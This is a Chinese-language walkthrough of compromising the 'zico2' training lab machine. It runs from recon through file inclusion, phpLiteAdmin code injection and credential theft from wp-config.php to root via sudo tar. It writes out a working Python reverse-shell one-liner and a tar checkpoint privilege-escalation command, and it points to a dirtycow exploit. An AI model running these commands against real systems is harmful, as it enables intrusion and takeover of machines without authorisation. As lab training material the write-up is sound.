zico2靶机
环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式
一.明确目标
探测目标主机IP情况
nmap 192.168.153.0/24
目标主机IP:192.168.153.157
Kali的IP:192.168.153.129
二.信息搜集
Nmap 进行常规端口开放扫描
进行namp全端口服务枚举
nmap 192.168.153.138 -p- -A
可以看到目标靶机上开放了SSH 22端口,Http 80端口, 111端口,38409端口
对该网站目录进行爆破枚举,利用到的是kali上的dirsearch:
dirsearch -u 192.168.153.157
http://192.168.153.157/dbadmin/
http://192.168.153.157/img/
首先在浏览器中访问http://192.168.153.157
每个可以点击的都查看一下,发现了最下面有个CHECK THEM OUT!点击进去不太一样
在其URL中有?page=的存在,疑似有文件包含,可以尝试一哈:
使用工具扫描发现确实存在目录遍历的漏洞,并且已经给出了攻击细节
page=../../etc/passwd
果然存在文件包含!!!
再访问http://192.168.153.157/dbadmin/
发现了phpLiteAdmin v1.9.3的登录页面,尝试弱密码登录,发现密码是admin。
(备注:phpLiteAdmin是一个用PHP写的基于web的SQLite数据库管理工具,同时支持SQLite3和SQLite2。 和SQLite一样,使用一个单一的文件(phpliteadmin.php)来运行,把这个文件放在有PHP的环境里运行,然后在浏览器中访问就可以使用而无需安装。)
前面我们发现了phpLiteAdmin v1.9.3的登录页面,也知道其版本,在Kali中搜索其有没有漏洞存在
searchsploit phpLiteAdmin 1.9.3
将24044.txt下载下来
searchsploit -m 24044.txt
cat一下:
其中大概意思就是攻击者可以使用php扩展创建sqlite数据库,并将php代码作为文本字段插入。完成后,攻击者可以通过使用web浏览器访问数据库文件来执行它。
也就是phpliteadmin <=1.9.3版本是存在远程php代码执行漏洞!!!!
首先创建一个hack.php数据库
在hack.php数据库里面创建任意一张表
内容写成一句话,由于对单引号做了过滤所以一句话里面不要加单引号
返回view.php包含hack.php
使用MAX HacKBar,一句话木马可以成功运行不
三.WebShell
使用pyhton来反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.153.158",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
在Kali中开启端口8888监听,执行代码
监听成功,使用命令显示当前路径
SHELL=/bin/bash script /dev/null
在zico的家目录中找到wordpress,这是一个免费开源的建站程序,进行该目录.
cat一下wp-config.php
在该文件中找到了zico的数据库密码
得到的用户和密码进行SSH远程登录尝试,成功登录
四.提权
使用sudo -l
可以通过具有root权限的tar和zip来提权。
通过tar提权:
sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"
-c:创建新的档案文件,相当于打包(-x,相反的操作,拆包)
-f:使用档名,f之后直接加档名,中间不能加其他参数
--checkpoint=n:每写入n个记录之后设置一个检查点,在检查点可以执行任意的操作,操作由--checkpoint-action指定
exec:执行外部命令
提权成功!!!!!!
补充:通过uname -a查看内核,其版本较低。可已使用dirtycow(脏牛)进行提权,exp网站:https://github.com/FireFart/dirtycow